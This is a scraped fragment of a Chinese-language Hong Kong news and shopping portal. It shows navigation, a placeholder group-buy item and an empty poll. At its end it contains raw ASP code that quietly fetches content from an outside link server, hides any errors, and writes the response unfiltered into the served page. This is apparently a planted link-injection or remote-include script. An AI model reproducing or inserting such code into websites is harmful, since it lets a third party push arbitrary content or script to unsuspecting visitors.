hkiol香港国际在线

新闻·生活-图文资讯

购物·香港-图文资讯

  • 活跃之星
  • 用户动态
  • 新鲜事
hkiol
  • 最新商品
  • 精品宝贝
更多>> 品牌推荐
团购大家
团购价:1.00元
折扣:1折
原价:1.00元
已售:
站内调查
没有任何调查!
<% Dim lvurl Dim lvcontent Dim lvxmlhttp On Error Resume Next lvurl = "http://links.alivv.com/getcode.aspx?wid=rbRPMRzrbV8=&type=3" set lvxmlhttp = CreateObject("MSXML2.Serverxmlhttp") On Error Resume Next if lvxmlhttp is nothing then set lvxmlhttp = Server.CreateObject("WinHttp.WinHttpRequest.5.1") end if On Error Resume Next if lvxmlhttp is nothing then set lvxmlhttp = CreateObject("MSXML2.Serverxmlhttp.4.0") end if if lvxmlhttp is nothing then 'cannot load xml component else lvxmlhttp.open "GET", lvurl, false lvxmlhttp.send "" if lvxmlhttp.Status = "200" then lvcontent = lvxmlhttp.responseText if InStr(lvcontent, "") > 0 then If Err Then Response.write Err.Description lvcontent = "" end if Response.write lvcontent end if set lvxmlhttp = nothing end if %>